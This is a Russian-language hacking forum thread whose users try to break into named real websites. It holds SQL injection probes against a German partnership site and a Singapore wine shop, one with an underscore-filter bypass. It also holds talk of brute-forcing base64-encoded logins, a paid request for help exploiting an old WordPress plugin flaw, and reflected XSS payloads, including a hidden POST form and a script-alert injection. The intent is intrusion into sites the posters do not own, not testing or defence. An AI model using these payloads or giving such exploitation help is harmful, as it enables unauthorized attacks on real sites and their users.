Code: http://www.rgre.de/rgre-partnerschaften/index.php?dt_orgname=&dt_plz=&dt_einwohnerzahl_min=&dt_einwohnerzahl_max=&dt_bundesland=&aus_orgname=&aus_plz=&aus_kontinent=&partner_seit_von=&partner_seit_bis=&partner_form=&submit=Suche&aus_land=GR&order_by=land' чёт туплю, не могу вывод сделать(
Абсолютно верно. Логин и пароль указаны в кодировке base64. По поводу перехватить - если ты не в одной сети с жервтой будет сложно. Зато брутится очень легко.
Code: http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf фильтр на _ Как обойти? принципиально важно обойти именно в нем ограничение
Code: http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf%255F
на сайте с wordpress есть плашин старый с вулном - https://www.exploit-db.com/exploits/36414/ Немного не понял как реализовать например sql inj, никто не сталкивался? Мб и я туплю. За помощь в реализации, готов отблагоодарить хорошо
Вместо your.wordpress.blog ставите адрес своего сайта, но не плохо было бы, сначало чекнуть сайт на уязвимость хотя бы наличием той же Reflected XSS
тут я понял, что адрес то нужен свой,дело в том, что плагин есть и он уязвим, а вот как грамотно чекнуть, тут проблема. По этому прошу помощи.
то есть в случае с Reflected XSS via HTTP referer, я должен отправить похожую форму: HTML: <form method=POST action="https://YOUR.BLOG/"> <input type=hidden name="action" value="sample-permalink"> <input type=submit> </form> с реферером: ?lang=en"><script>alert("hello");</'+'script> Но, на сайте как я понял у них есть реврайт, язык переключается просто site.ru/en, а при попытке ?lang=en ведет на страницу с новостями/постами...
Mozilla выдает Code: <a href="/message.php?mesid=0101&r0zt7%22%3E%3Cscript%3Ealert(1)%3C/script%3Eabys9=1&sb=88">Apple</a> Burp выдает Code: <a href="/message.php?mesid=0101&r0zt7"><script>alert(1)</script>abys9=1&sb=88">Apple</a> Я так понимаю мешает URL ENCODE как эксплуатируется?